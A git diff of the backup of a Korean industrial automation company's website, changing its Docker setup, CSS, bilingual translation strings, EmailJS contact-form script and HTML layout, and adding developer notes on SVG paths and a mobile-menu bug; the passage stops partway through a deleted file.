diff --git a/.Backup/docker-compose.yml b/.Backup/docker-compose.yml deleted file mode 100644 index 2cf583c..0000000 --- a/.Backup/docker-compose.yml +++ /dev/null @@ -1,22 +0,0 @@ -version: '3.8' -services: - # 1. 관리 도구 (Nginx Proxy Manager) - npm: - image: 'jc21/nginx-proxy-manager:latest' - container_name: npm-admin - restart: unless-stopped - ports: - - '80:80' # HTTP 외부 접속용 - - '81:81' # 관리자 화면 접속용 (HMI 역할) - - '443:443' # HTTPS 보안 접속용 - volumes: - - ./npm/data:/data - - ./npm/letsencrypt:/etc/letsencrypt - - # 2. 실제 홈페이지 (공사 중 페이지) - web-server: - image: nginx:alpine - container_name: hanmo-home - restart: unless-stopped - volumes: - - ./html:/usr/share/nginx/html:ro diff --git a/.Backup/html/.gitignore b/.Backup/html /.gitignore similarity index 100% rename from .Backup/html/.gitignore rename to .Backup/html /.gitignore diff --git a/.Backup/html/assets/css/style.css b/.Backup/html /assets/css/style.css similarity index 52% rename from .Backup/html/assets/css/style.css rename to .Backup/html /assets/css/style.css index 0f553b3..9a90a1e 100644 --- a/.Backup/html/assets/css/style.css +++ b/.Backup/html /assets/css/style.css @@ -38,16 +38,70 @@ body { filter: grayscale(0); } +/* ── 헤더 & 네비게이션 ───────────────────────────────────── */ +/* 기본 상태: 투명 배경 위 (흰색 텍스트) */ +.nav-link { + color: white; +} + +#brand-name { + color: white; +} + +/* 스크롤 시: 흰색 배경 (어두운 텍스트) */ +#main-header.scrolled { + background: rgba(255, 255, 255, 0.95); + backdrop-filter: blur(16px); + box-shadow: 0 4px 20px rgba(0, 0, 0, 0.08); +} + +#main-header.scrolled .nav-link { + color: #1e293b; +} + +#main-header.scrolled #brand-name { + color: #1e293b; +} + /* ── 언어 전환 버튼 ───────────────────────────────────────── */ +/* 기본 상태: 투명 배경 위 (흰색) */ .lang-btn { background: transparent; - opacity: 0.5; - transition: all 0.2s; + color: white; + opacity: 0.85; + transition: all 0.3s; } + .lang-btn:hover { - opacity: 0.8; -} -.lang-btn.active-lang { - background: #2563eb; opacity: 1; } + +.lang-btn.active-lang { + background: rgba(37, 99, 235, 0.9); + opacity: 1; +} + +/* 스크롤 시: 흰색 배경 (어두운 텍스트) */ +#main-header.scrolled .lang-btn { + color: #1e293b; + opacity: 0.7; +} + +#main-header.scrolled .lang-btn:hover { + opacity: 1; +} + +#main-header.scrolled .lang-btn.active-lang { + background: #2563eb; + color: white; + opacity: 1; +} + +/* 언어 버튼 컨테이너 테두리 */ +#lang-container { + border-color: rgba(255, 255, 255, 0.3); +} + +#main-header.scrolled #lang-container { + border-color: rgba(0, 0, 0, 0.15); +} diff --git a/.Backup/html/assets/images/BatchControl.png b/.Backup/html /assets/images/BatchControl.png similarity index 100% rename from .Backup/html/assets/images/BatchControl.png rename to .Backup/html /assets/images/BatchControl.png diff --git a/.Backup/html/assets/images/ControlRoom1.png b/.Backup/html /assets/images/ControlRoom1.png similarity index 100% rename from .Backup/html/assets/images/ControlRoom1.png rename to .Backup/html /assets/images/ControlRoom1.png diff --git a/.Backup/html/assets/images/ControlRoom2.png b/.Backup/html /assets/images/ControlRoom2.png similarity index 100% rename from .Backup/html/assets/images/ControlRoom2.png rename to .Backup/html /assets/images/ControlRoom2.png diff --git a/.Backup/html/assets/images/ControlRoom3.png b/.Backup/html /assets/images/ControlRoom3.png similarity index 100% rename from .Backup/html/assets/images/ControlRoom3.png rename to .Backup/html /assets/images/ControlRoom3.png diff --git a/.Backup/html/assets/images/ControlRoom4.png b/.Backup/html /assets/images/ControlRoom4.png similarity index 100% rename from .Backup/html/assets/images/ControlRoom4.png rename to .Backup/html /assets/images/ControlRoom4.png diff --git a/.Backup/html/assets/images/ControlRoom5.png b/.Backup/html /assets/images/ControlRoom5.png similarity index 100% rename from .Backup/html/assets/images/ControlRoom5.png rename to .Backup/html /assets/images/ControlRoom5.png diff --git a/.Backup/html/assets/images/ControlRoom6.png b/.Backup/html /assets/images/ControlRoom6.png similarity index 100% rename from .Backup/html/assets/images/ControlRoom6.png rename to .Backup/html /assets/images/ControlRoom6.png diff --git a/.Backup/html/assets/images/ControlRoom7.png b/.Backup/html /assets/images/ControlRoom7.png similarity index 100% rename from .Backup/html/assets/images/ControlRoom7.png rename to .Backup/html /assets/images/ControlRoom7.png diff --git a/.Backup/html/assets/images/bearing.png b/.Backup/html /assets/images/bearing.png similarity index 100% rename from .Backup/html/assets/images/bearing.png rename to .Backup/html /assets/images/bearing.png diff --git a/.Backup/html/assets/images/dcsintegration.png b/.Backup/html /assets/images/dcsintegration.png similarity index 100% rename from .Backup/html/assets/images/dcsintegration.png rename to .Backup/html /assets/images/dcsintegration.png diff --git a/.Backup/html/assets/images/favicon.ico b/.Backup/html /assets/images/favicon.ico similarity index 100% rename from .Backup/html/assets/images/favicon.ico rename to .Backup/html /assets/images/favicon.ico diff --git a/.Backup/html/assets/images/honeywell-logo.svg b/.Backup/html /assets/images/honeywell-logo.svg similarity index 100% rename from .Backup/html/assets/images/honeywell-logo.svg rename to .Backup/html /assets/images/honeywell-logo.svg diff --git a/.Backup/html /assets/images/icons/icons.svg b/.Backup/html /assets/images/icons/icons.svg new file mode 100644 index 0000000..cac35f2 --- /dev/null +++ b/.Backup/html /assets/images/icons/icons.svg @@ -0,0 +1,56 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/.Backup/html /assets/images/icons/orginalSVG/CV.svg b/.Backup/html /assets/images/icons/orginalSVG/CV.svg new file mode 100644 index 0000000..3f0e153 --- /dev/null +++ b/.Backup/html /assets/images/icons/orginalSVG/CV.svg @@ -0,0 +1,243 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/.Backup/html /assets/images/icons/orginalSVG/XV.svg b/.Backup/html /assets/images/icons/orginalSVG/XV.svg new file mode 100644 index 0000000..83bc5ed --- /dev/null +++ b/.Backup/html /assets/images/icons/orginalSVG/XV.svg @@ -0,0 +1,227 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/.Backup/html /assets/images/icons/path.png b/.Backup/html /assets/images/icons/path.png new file mode 100644 index 0000000..f14cebd Binary files /dev/null and b/.Backup/html /assets/images/icons/path.png differ diff --git a/.Backup/html /assets/images/icons/path좌표문자.md b/.Backup/html /assets/images/icons/path좌표문자.md new file mode 100644 index 0000000..8b08c15 --- /dev/null +++ b/.Backup/html /assets/images/icons/path좌표문자.md @@ -0,0 +1,26 @@ +이제 SVG 명령어들을 한눈에 볼 수 있는 요약표를 만들어드릴게요. 과 처럼 대문자/소문자의 차이는 절대 좌표 vs 상대 좌표라는 점을 기억하시면 됩니다. + +🔹 주요 Path 명령어 요약표 + +![alt text](path.png) + +🔹 주요 Path 명령어 요약표 + +| 명령어 | 의미 | 대문자(절대) | 소문자(상대) | 예시 | +|--------|------|--------------|--------------|------| +| **M / m** | Move To (좌표 이동) | 지정한 좌표로 이동 | 현재 위치 기준으로 이동 | `M 10 20` / `m 10 20` | +| **L / l** | Line To (직선 그리기) | 지정 좌표까지 직선 | 현재 위치에서 상대 이동 직선 | `L 30 40` / `l 30 40` | +| **H / h** | Horizontal Line | 지정 x좌표까지 수평선 | 현재 위치에서 x축 상대 이동 | `H 50` / `h 50` | +| **V / v** | Vertical Line | 지정 y좌표까지 수직선 | 현재 위치에서 y축 상대 이동 | `V 60` / `v 60` | +| **C / c** | Cubic Bézier Curve | 절대 좌표로 곡선 제어점 지정 | 상대 좌표로 곡선 제어점 지정 | `C x1 y1, x2 y2, x y` | +| **Q / q** | Quadratic Bézier Curve | 절대 좌표로 곡선 제어점 지정 | 상대 좌표로 곡선 제어점 지정 | `Q x1 y1, x y` | +| **A / a** | Arc (호 그리기) | 절대 좌표로 원호 | 상대 좌표로 원호 | `A rx ry x-axis-rotation large-arc-flag sweep-flag x y` | +| **Z / z** | Close Path | 현재 경로를 시작점과 연결해 닫기 | 동일 | `Z` | + + + + +🔹 핵심 정리 +• 대문자 → 절대 좌표 (캔버스 기준) +• 소문자 → 상대 좌표 (현재 위치 기준) +• /은 시작점 이동, /은 직선, /는 곡선, 는 닫기 diff --git a/.Backup/html/assets/images/instrument.png b/.Backup/html /assets/images/instrument.png similarity index 100% rename from .Backup/html/assets/images/instrument.png rename to .Backup/html /assets/images/instrument.png diff --git a/.Backup/html/assets/images/reactor.png b/.Backup/html /assets/images/reactor.png similarity index 100% rename from .Backup/html/assets/images/reactor.png rename to .Backup/html /assets/images/reactor.png diff --git a/.Backup/html/assets/js/i18n.js b/.Backup/html /assets/js/i18n.js similarity index 90% rename from .Backup/html/assets/js/i18n.js rename to .Backup/html /assets/js/i18n.js index f94936b..dfea10d 100644 --- a/.Backup/html/assets/js/i18n.js +++ b/.Backup/html /assets/js/i18n.js @@ -12,7 +12,7 @@ const translations = { 'nav.services' : 'References', 'nav.about' : 'About', 'nav.contact' : 'Contact', - 'nav.quote' : 'Request Quote', + 'nav.quote' : 'Inquiry', // HERO 'hero.badge' : 'Precision Industrial Control', @@ -68,23 +68,23 @@ const translations = { 'db.btn' : 'Get Infrastructure Consultation', // INSTRUMENTS - 'inst.badge' : 'Precision Measurement', + 'inst.badge' : 'Precision Measurement & Actuation', 'inst.title' : 'Control Instruments', - 'inst.desc' : 'Smart field instruments engineered for accuracy and reliability in demanding industrial environments.', + 'inst.desc' : 'Optimal Precision Starts with Understanding of Your Environment', 'inst.i1.title' : 'Flow Transmitters', - 'inst.i1.desc' : 'Magnetic, Coriolis, and vortex flow meters with ±0.5% accuracy', + 'inst.i1.desc' : 'Magnetic, Coriolis, and Vortex, traditional flowmeters', 'inst.i2.title' : 'Pressure Transmitters', 'inst.i2.desc' : 'Differential and absolute pressure sensors for ultra-high sensitivity', 'inst.i3.title' : 'Temperature Sensors', 'inst.i3.desc' : 'RTD, thermocouple, and infrared temperature measurement', 'inst.i4.title' : 'Level Transmitters', - 'inst.i4.desc' : 'Ultrasonic, radar, and capacitive level sensors', + 'inst.i4.desc' : 'Ultrasonic, radar, capacitive and float level sensors', 'inst.i5.title' : 'Analytical Sensors', - 'inst.i5.desc' : 'pH, conductivity, oxygen, and dissolved gas analyzers', + 'inst.i5.desc' : 'pH, conductivity, oxygen, and dissolved gas analyzer', 'inst.i6.title' : 'Control Valves', 'inst.i6.desc' : 'Smart positioners with HART communication', - 'inst.i7.title' : 'Vibration Monitors', - 'inst.i7.desc' : 'Accelerometers and velocity sensors for predictive maintenance', + 'inst.i7.title' : 'Shutoff Valves', + 'inst.i7.desc' : 'Pneumatic, Electrical on/off valves with Explosion proof', 'inst.i8.title' : 'Smart Data Loggers', 'inst.i8.desc' : 'IoT-enabled data acquisition units with cloud connectivity', 'inst.custom.title' : 'Custom Integration Available', @@ -94,30 +94,30 @@ const translations = { // REFERENCES 'svc.badge' : 'Referenced Plant Varieties', - 'svc.title' : 'Versatile Automation References', - 'svc.desc' : 'From Deep Understanding of various industry references to Seamless Execution.', + 'svc.title' : 'Versatile Process References', + 'svc.desc' : 'From deep understanding of various industry references to Seamless Execution.', 'svc.s1.title' : 'DCS / SCADA', 'svc.s1.desc' : 'Semiconductor Solvent Recovery Plant., 80% Hydrazin Plant, SNCR & SCR Envirionmental Plant, etc', 'svc.s1.item1' : 'Semiconductor Solvent Recovery Plant', 'svc.s1.item2' : '80% Hydrazin Plant', 'svc.s1.item3' : 'SNCR & SCR in Power Plant', 'svc.s1.item4' : 'Oil Tank Terminal', - 'svc.s1.link' : 'Learn More', + //'svc.s1.link' : 'Learn More', 'svc.s2.title' : 'Batch Plant', 'svc.s2.desc' : 'Real-time monitoring platforms with advanced HMI and secure remote access protocols.', 'svc.s2.item1' : 'Micro Capsule forming agent plant', 'svc.s2.item2' : 'ADCA,HDCA Plant', 'svc.s2.item3' : 'Vacuum Furnace Plant - Decorative Stainless Plate', - 'svc.s2.link' : 'Case Studies', + //'svc.s2.link' : 'Case Studies', 'svc.s3.title' : 'Other Projects', 'svc.s3.desc' : 'Various industrial automation projects.', - 'svc.s3.item1' : 'Waste to Energy Incineration Plant', - 'svc.s3.item2' : 'Copper Rod Continuous Casting Plant', - 'svc.s3.item3' : 'Bearing Continuous Heat Treatment Plant', - 'svc.s3.item4' : 'High Speed Cold Rolling Continuous Casting Plant', - 'svc.s3.link' : 'CASE STUDIES', + 'svc.s3.item1' : 'Waste to Energy Incinerator Plant', + 'svc.s3.item2' : 'Copper Continuous Casting Plant', + 'svc.s3.item3' : 'Bearing Heat Treatment Plant', + 'svc.s3.item4' : 'Chlor-Alkali Plant', + //'svc.s3.link' : 'CASE STUDIES', 'svc.s4.title' : 'Instruments', 'svc.s4.desc' : 'Smart field sensors for flow, pressure, and temperature with high-accuracy calibration.', @@ -127,7 +127,7 @@ const translations = { 'svc.s4.item4' : 'Flownics', 'svc.s4.item5' : 'Komoto - (Motoyama Korea)', 'svc.s4.item6' : 'Autonics - (Konics)', - 'svc.s4.link' : 'Product Catalog', + //'svc.s4.link' : 'Product Catalog', // ABOUT 'about.badge' : 'About Hanmo', @@ -164,10 +164,10 @@ const translations = { 'nav.batch' : '배치 프로세스', 'nav.dbsvr' : '데이터베이스 서버', 'nav.products' : '계측기기', - 'nav.services' : '실적 플랜트 분야', + 'nav.services' : '실적 플랜트', 'nav.about' : '회사소개', 'nav.contact' : '문의하기', - 'nav.quote' : '견적 요청', + 'nav.quote' : '상담 신청', // HERO 'hero.badge' : '정밀 공정 제어 시스템', @@ -238,14 +238,14 @@ const translations = { 'inst.i5.desc' : 'pH, 전도도, 산소, 용존 가스 분석기', 'inst.i6.title' : '컨트롤 밸브', 'inst.i6.desc' : 'HART 통신 지원 스마트 포지셔너', - 'inst.i7.title' : '진동 모니터', - 'inst.i7.desc' : '예측 유지보수를 위한 가속도계 및 속도 센서', + 'inst.i7.title' : '온오프 밸브', + 'inst.i7.desc' : '공압, 전기식 셧오프 밸브', 'inst.i8.title' : '스마트 데이터 로거', 'inst.i8.desc' : '클라우드 연결 기능을 갖춘 IoT 데이터 수집 장치', 'inst.custom.title' : '맞춤형 통합 솔루션 제공', 'inst.custom.desc' : '모든 계측기기는 당사의 DCS 및 SCADA 플랫폼과 원활하게 통합됩니다. 특수 응용 분야에 맞는 커스텀 구성이 가능합니다.', 'inst.custom.btn' : '맞춤 구성 요청', - 'inst.quote' : '견적 요청 →', + 'inst.quote' : '상담 신청 →', // REFERENCES 'svc.badge' : '실적 플랜트 분야', @@ -257,20 +257,20 @@ const translations = { 'svc.s1.item2' : '80% 하이드라진 플랜트', 'svc.s1.item3' : '발전소 SNCR & SCR 플랜트', 'svc.s1.item4' : '오일 탱크 터미널 플랜트', - 'svc.s1.link' : '자세히 보기', + // 'svc.s1.link' : '자세히 보기', 'svc.s2.title' : '배치 플랜트', 'svc.s2.desc' : '실시간 모니터링 플랫폼과 고급 HMI, 안전한 원격 액세스 프로토콜을 갖춘 배치 플랜트 제어 시스템', 'svc.s2.item1' : '마이크로 캡슐 발포제 플랜트', 'svc.s2.item2' : 'ADCA,HDCA 플랜트', 'svc.s2.item3' : '진공 열처리로 플랜트', - 'svc.s2.link' : '사례 연구', + // 'svc.s2.link' : '사례 연구', 'svc.s3.title' : '기타 프로젝트', 'svc.s3.desc' : '기타 핵심 산업 자동화', 'svc.s3.item1' : '쓰레기 소각장 플랜트', 'svc.s3.item2' : '구리 환재 연속 주조로', 'svc.s3.item3' : '베어링 연속 열처리로 플랜트', - 'svc.s3.item4' : '고속 냉간 연속 주조로 플랜트', - 'svc.s3.link' : '데이터 보안', + 'svc.s3.item4' : '가성소다, 염소 전해 플랜트', + // 'svc.s3.link' : '데이터 보안', 'svc.s4.title' : '제어 계측기기 협력사', 'svc.s4.desc' : '고객 현장에 대한 깊은 이해를 바탕으로 최적 계측기 선정', 'svc.s4.item1' : '한국하니웰(주)', @@ -279,16 +279,16 @@ const translations = { 'svc.s4.item4' : '플로우닉스(주)', 'svc.s4.item5' : '(주)코모토', 'svc.s4.item6' : '오토닉스(주)', - 'svc.s4.link' : '제품 카탈로그', + // 'svc.s4.link' : '제품 카탈로그', // ABOUT 'about.badge' : '회사 소개', 'about.title' : '공정 자동화의 신뢰할 수 있는 파트너', 'about.p1' : '(주)한모씨앤앤는 창립 이래 공정 자동화 엔지니어링의 최전선에서 활동하고 있습니다. 세계에서 가장 까다로운 공정 현장을 위한 미션 크리티컬 제어 시스템 설계, 구현 및 유지보수를 전문으로 합니다.', - 'about.p2' : 'DCS, SCADA, 계측기기, 공정 네트워킹 분야에서 수십 년의 경험을 바탕으로 최고의 정밀도와 신뢰성을 보장합니다.', + 'about.p2' : 'DCS, SCADA, 계측기기, 제어반 설계 및 제작, 공정 네트워킹 분야에서 수십 년의 경험을 바탕으로 최고의 정밀도와 신뢰성을 보장합니다.', 'about.cert' : '인증', 'about.support' : '지원', - 'about.years' : '여년간의 공정 제어 전문성', + 'about.years' : 'Years of Industrial Excellence', // CONTACT 'contact.badge' : '문의하기', @@ -329,8 +329,10 @@ function applyTranslations() { el.textContent = t(key); } }); + // 업데이트 document.documentElement.lang = currentLang; + // 버튼 활성 상태 업데이트 document.querySelectorAll('.lang-btn').forEach(btn => { btn.classList.toggle('active-lang', btn.dataset.lang === currentLang); @@ -343,4 +345,5 @@ function switchLang(lang) { applyTranslations(); } +// DOMContentLoaded 시 번역 적용 document.addEventListener('DOMContentLoaded', applyTranslations); diff --git a/.Backup/html /assets/js/script.js b/.Backup/html /assets/js/script.js new file mode 100644 index 0000000..b1a4c39 --- /dev/null +++ b/.Backup/html /assets/js/script.js @@ -0,0 +1,149 @@ +// ============================================================ +// ★ EmailJS 설정 - 아래 3가지 값을 본인 계정으로 교체하세요 ★ +// ============================================================ +const EMAILJS_PUBLIC_KEY = 'HO6i369gX6X5HEXtJ'; +const EMAILJS_SERVICE_ID = 'service_4ur5lqd'; +const EMAILJS_TEMPLATE_ID = 'template_jp0v5qv'; +// ============================================================ + +emailjs.init(EMAILJS_PUBLIC_KEY); + +// ── Contact Form ───────────────────────────────────────────── +document.getElementById('contact-submit').addEventListener('click', function () { + const name = document.getElementById('contact-name').value.trim(); + const email = document.getElementById('contact-email').value.trim(); + const company = document.getElementById('contact-company').value.trim(); + const message = document.getElementById('contact-message').value.trim(); + const btn = document.getElementById('contact-submit'); + + if (!name || !email || !message) { + showStatus('error', t('contact.error.required')); return; + } + if (!/^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(email)) { + showStatus('error', t('contact.error.email')); return; + } + + btn.disabled = true; + btn.textContent = t('contact.sending'); + + const templateParams = { + name : name, + message : 'Email : ' + email + '\nCompany : ' + (company || 'N/A') + '\n\n' + message, + reply_to : email + }; + + emailjs.send(EMAILJS_SERVICE_ID, EMAILJS_TEMPLATE_ID, templateParams) + .then(function () { + showStatus('success', t('contact.success')); + document.getElementById('contact-name').value = ''; + document.getElementById('contact-email').value = ''; + document.getElementById('contact-company').value = ''; + document.getElementById('contact-message').value = ''; + }) + .catch(function (error) { + console.error('EmailJS error:', error); + showStatus('error', t('contact.error.fail')); + }) + .finally(function () { + btn.disabled = false; + btn.textContent = t('contact.btn'); + }); +}); + +function showStatus(type, msg) { + const status = document.getElementById('contact-status'); + status.classList.remove('hidden', 'bg-green-500/20', 'text-green-400', 'bg-red-500/20', 'text-red-400'); + status.classList.add(type === 'success' ? 'bg-green-500/20' : 'bg-red-500/20', + type === 'success' ? 'text-green-400' : 'text-red-400'); + status.textContent = msg; +} + +// ============================================================ +// 메인 스크립트 (전체 기능 포함) +// ============================================================ + +// DOMContentLoaded 이벤트 +document.addEventListener('DOMContentLoaded', () => { + + // ============================================================ + // 메뉴 토글 + // ============================================================ + const menuBtn = document.querySelector('#mobile-menu-btn'); + const navMenu = document.querySelector('#mobile-menu'); + const closeBtn = document.querySelector('#close-menu-btn'); + if (menuBtn && navMenu) { + // 메뉴열기 + menuBtn.addEventListener('click', () => { + navMenu.classList.remove('translate-x-full'); + menuBtn.classList.toggle('open'); + }); + //메뉴닫기 + if (closeBtn) { + closeBtn.addEventListener('click', () => { + navMenu.classList.add('translate-x-full'); + }); + } + //메뉴 링크 클릭 시 닫기 + navMenu.querySelectorAll('a').forEach(link => { + link.addEventListener('click',() => { + navMenu.classList.add('translate-x-full'); + }); + }); + } + + // ============================================================ + // 스크롤 애니메이션 + // ============================================================ + const scrollElems = document.querySelectorAll('[data-scroll]'); + const observerOptions = { + root: null, + rootMargin: '0px', + threshold: 0.1 + }; + const scrollObserver = new IntersectionObserver((entries, observer) => { + entries.forEach(entry => { + if (entry.isIntersecting) { + entry.target.classList.add('animate'); + observer.unobserve(entry.target); + } + }); + }, observerOptions); + + scrollElems.forEach(el => scrollObserver.observe(el)); + + // ============================================================ + // 상단 버튼/헤더 스크롤 효과 + // ============================================================ + const header = document.querySelector('header'); + const topBtn = document.querySelector('.back-to-top'); + window.addEventListener('scroll', () => { + if (window.scrollY > 50) { + header?.classList.add('scrolled'); + topBtn?.classList.add('visible'); + } else { + header?.classList.remove('scrolled'); + topBtn?.classList.remove('visible'); + } + }); + + topBtn?.addEventListener('click', () => window.scrollTo({ top: 0, behavior: 'smooth' })); + + // ============================================================ + // 기타 커스텀 이벤트/버튼 + // ============================================================ + // 예: 상담 신청 모달 열기 + document.querySelectorAll('.open-consult').forEach(btn => { + btn.addEventListener('click', () => { + const modal = document.querySelector('#consult-modal'); + modal?.classList.add('open'); + }); + }); + + // 예: 모달 닫기 + document.querySelectorAll('.modal .close-btn').forEach(btn => { + btn.addEventListener('click', () => { + const modal = btn.closest('.modal'); + modal?.classList.remove('open'); + }); + }); +}); diff --git a/.Backup/html /assets/js/모바일메뉴 사라짐.md b/.Backup/html /assets/js/모바일메뉴 사라짐.md new file mode 100644 index 0000000..cc5adce --- /dev/null +++ b/.Backup/html /assets/js/모바일메뉴 사라짐.md @@ -0,0 +1,198 @@ +모바일 메뉴가 동작하지 않는 문제를 찾았습니다! 🔍 +🔴 문제점 발견 +1. 클래스명 불일치 (가장 큰 문제!) +script.js: +javascriptconst menuBtn = document.querySelector('.menu-btn'); // ❌ .menu-btn +const navMenu = document.querySelector('.nav-menu'); // ❌ .nav-menu +index.html: +html + +
+ +
+→ .menu-btn과 .nav-menu 클래스가 HTML에 없습니다! + +2. 닫기 버튼도 작동 안 함 +script.js: +javascriptdocument.querySelectorAll('.modal .close-btn').forEach(btn => { + // ❌ .close-btn 클래스를 찾지만... +}); +index.html: +html + + +3. 이벤트 핸들러 중복 +script.js 하단: +javascript// 메뉴 토글 코드가 있는데... +const menuBtn = document.querySelector('.menu-btn'); +index.html 하단: +html + +📋 문제 요약 +요소script.js에서 찾는 것index.html 실제메뉴 버튼.menu-btn#mobile-menu-btn (클래스 없음)메뉴.nav-menu#mobile-menu (클래스 없음)닫기 버튼.modal .close-btn#close-menu-btn (클래스 없음) + +✅ 해결 방법 (3가지 옵션) +옵션 1: script.js 수정 (권장) +ID로 찾도록 변경: +javascriptconst menuBtn = document.querySelector('#mobile-menu-btn'); // ID로 변경 +const navMenu = document.querySelector('#mobile-menu'); // ID로 변경 +옵션 2: index.html 수정 +클래스 추가: +html + - + - @@ -66,9 +68,9 @@
-
- - +
+ +
@@ -81,7 +83,7 @@ Services About Contact - +
@@ -127,47 +129,95 @@
- - +
-

Advanced Control Systems

-

DCS Integration

-

Enterprise-grade Distributed Control System architecture designed for the most critical industrial applications.

+

+ Advanced Control Systems +

+

+ DCS Integration +

+

+ Enterprise-grade Distributed Control System architecture designed for the most critical industrial applications. +

+
-
DCS Control Room
+ +
+ DCS Control Room +
+
-
- + +
Honeywell Logo +

+ Reliable DCS solutions with Honeywell's Experion PKS, ensuring seamless integration and optimal performance +

+
+ + +
-

Reliable DCS solutions with Honeywell's Experion PKS, ensuring seamless integration and optimal performance

-
-
-
-

Redundant Architecture

Fault-tolerant systems with dual processing units ensuring 99.99% uptime

-
-
-
-

Real-time Communication

Sub-millisecond response times with synchronized control across multiple nodes

+
+
+ +
+
+
+

Redundant Architecture

+

+ Fault-tolerant systems with dual processing units ensuring 99.99% uptime +

+
+
-
-

Security Certified

IEC 62443 compliance with military-grade encryption protocols

+
+
+ +
+
+
+

Real-time Communication

+

+ Sub-millisecond response times with synchronized control across multiple nodes +

+
+
+ +
+
+
+ +
+
+
+

Security Certified

+

+ IEC 62443 compliance with military-grade encryption protocols +

+
- + + +
- -
+
-
+

Process Automation

Batch Process Control

Not only precision control, but also production planning,process data & historical lot management, you can get it by our Batch Manager software.

@@ -202,7 +252,6 @@
-
@@ -243,97 +292,97 @@
- +
-
+

Precision Measurement

Control Instruments

-

Smart field instruments engineered for accuracy and reliability in demanding industrial environments.

+

Optimal Precision Starts with Understanding of Your Environment

-
+

Flow Transmitters

Magnetic, Coriolis, and vortex flow meters with ±0.5% accuracy

-
Range: 0-1000 m³/h
4-20mA / Pulse output
IP67 rated
- Get Quote → +
Endress+Hauser
Flownics
Azbil , Honeywell
+
-
+

Pressure Transmitters

Differential and absolute pressure sensors for ultra-high sensitivity

-
Range: -1 to 1000 bar
±0.1% accuracy
ATEX certified
- Get Quote → +
Azbil
Honeywell
Autonics , Endress+Hauser
+
-
+

Temperature Sensors

RTD, thermocouple, and infrared temperature measurement

-
Range: -50 to +300°C
±0.3°C accuracy
Fast response time
- Get Quote → +
Autonics
Azbil
Honeywell , Endress+Hauser
+
-
-

Level Transmitters

Ultrasonic, radar, and capacitive level sensors

-
Range: 0-30 meters
±2mm repeatability
Dust-proof design
- Get Quote → +
+

Level Transmitters

Ultrasonic, radar, capacitive and float level sensors

+
Endress+Hauser
Seojin Instec
Hanil Level
+
-
+

Analytical Sensors

pH, conductivity, oxygen, and dissolved gas analyzers

-
Multi-parameter capability
Automatic calibration
Real-time data logging
- Get Quote → +
Honeywell Analytics
Toa DKK
Gastron
+
-
+

Control Valves

Smart positioners with HART communication

-
±0.5% repeatability
HART protocol
Self-tuning algorithm
- Get Quote → +
Komoto (Motoyama Korea)
Azbil
Honeywell
+
-
-

Vibration Monitors

Accelerometers and velocity sensors for predictive maintenance

-
Frequency: 0-20 kHz
Wireless capability
FFT analysis ready
- Get Quote → +
+

Shutoff Valves

Accelerometers and velocity sensors for predictive maintenance

+
Automa
Proval
Flowserve
+
-
+

Smart Data Loggers

IoT-enabled data acquisition units with cloud connectivity

16-32 analog channels
4G/WiFi/Ethernet
Local data storage
- Get Quote → +
-
+
-
+

Referenced Plant Varieties

-

Versatile Automation References

-

From Deep Understanding of various industry references to Seamless Execution.

+

Versatile Process References

+

From deep understanding of various industry references to Seamless Execution.

DCS
-
+

DCS Integration

    Learn More +
SCADA
-
+

SCADA Design

    Case Studies +
Historian
-
+

Data Historians

- Data Security +
Instruments
-
+

Control Instruments

- Product Catalog +
@@ -489,16 +538,16 @@
About Hanmo
-
+
20+
Years of Industrial Excellence
-
+

About Hanmo

Trusted Partner in Industrial Automation

Since our founding, Hanmo Control & Network Co., Ltd. has been at the forefront of industrial automation engineering.

-

Our team of 60+ certified engineers brings decades of combined experience in DCS, SCADA, and industrial networking.

+

Our team of 60+ certified engineers brings decades of combined experience in DCS, SCADA, and industrial networking.

ISO 9001
@@ -558,7 +607,7 @@ - + diff --git a/.Backup/html /status.json b/.Backup/html /status.json new file mode 100644 index 0000000..8a377fc --- /dev/null +++ b/.Backup/html /status.json @@ -0,0 +1 @@ +{"cpu_temp": "40", "nvme_temp": "33", "uptime_days": 6, "last_update": "11:54:01"} \ No newline at end of file diff --git a/.Backup/html/App.tsx b/.Backup/html/App.tsx deleted file mode 100644 index b1f9110..0000000 --- a/.Backup/html/App.tsx +++ /dev/null @@ -1,50 +0,0 @@ - -import React, { useEffect } from 'react'; -import { HashRouter as Router, Routes, Route, useLocation } from 'react-router-dom'; -import Header from './components/Header'; -import Hero from './components/Hero'; -import Services from './components/Services'; -import About from './components/About'; -import Contact from './components/Contact'; -import Footer from './components/Footer'; -import ChatBot from './components/ChatBot'; - -const ScrollToTop = () => { - const { pathname } = useLocation(); - useEffect(() => { - window.scrollTo(0, 0); - }, [pathname]); - return null; -}; - -const HomePage = () => ( - <> - - - - - -); - -const App: React.FC = () => { - return ( - - -
-
-
- - } /> -
} /> -
} /> -
} /> - - -
- -
- - ); -}; - -export default App; diff --git a/.Backup/html/README.md b/.Backup/html/README.md deleted file mode 100644 index 992aff3..0000000 --- a/.Backup/html/README.md +++ /dev/null @@ -1,20 +0,0 @@ -
-GHBanner -
- -# Run and deploy your AI Studio app - -This contains everything you need to run your app locally. - -View your app in AI Studio: https://ai.studio/apps/drive/12rxvTk7cfpawzA-KqF6Z1AfiIdHEhLqT - -## Run Locally - -**Prerequisites:** Node.js - - -1. Install dependencies: - `npm install` -2. Set the `GEMINI_API_KEY` in [.env.local](.env.local) to your Gemini API key -3. Run the app: - `npm run dev` diff --git a/.Backup/html/assets/js/script.js b/.Backup/html/assets/js/script.js deleted file mode 100644 index c144d8d..0000000 --- a/.Backup/html/assets/js/script.js +++ /dev/null @@ -1,89 +0,0 @@ -// ============================================================ -// ★ EmailJS 설정 - 아래 3가지 값을 본인 계정으로 교체하세요 ★ -// ============================================================ -const EMAILJS_PUBLIC_KEY = 'HO6i369gX6X5HEXtJ'; -const EMAILJS_SERVICE_ID = 'service_4ur5lqd'; -const EMAILJS_TEMPLATE_ID = 'template_jp0v5qv'; -// ============================================================ - -emailjs.init(EMAILJS_PUBLIC_KEY); - -// ── Contact Form ───────────────────────────────────────────── -document.getElementById('contact-submit').addEventListener('click', function () { - const name = document.getElementById('contact-name').value.trim(); - const email = document.getElementById('contact-email').value.trim(); - const company = document.getElementById('contact-company').value.trim(); - const message = 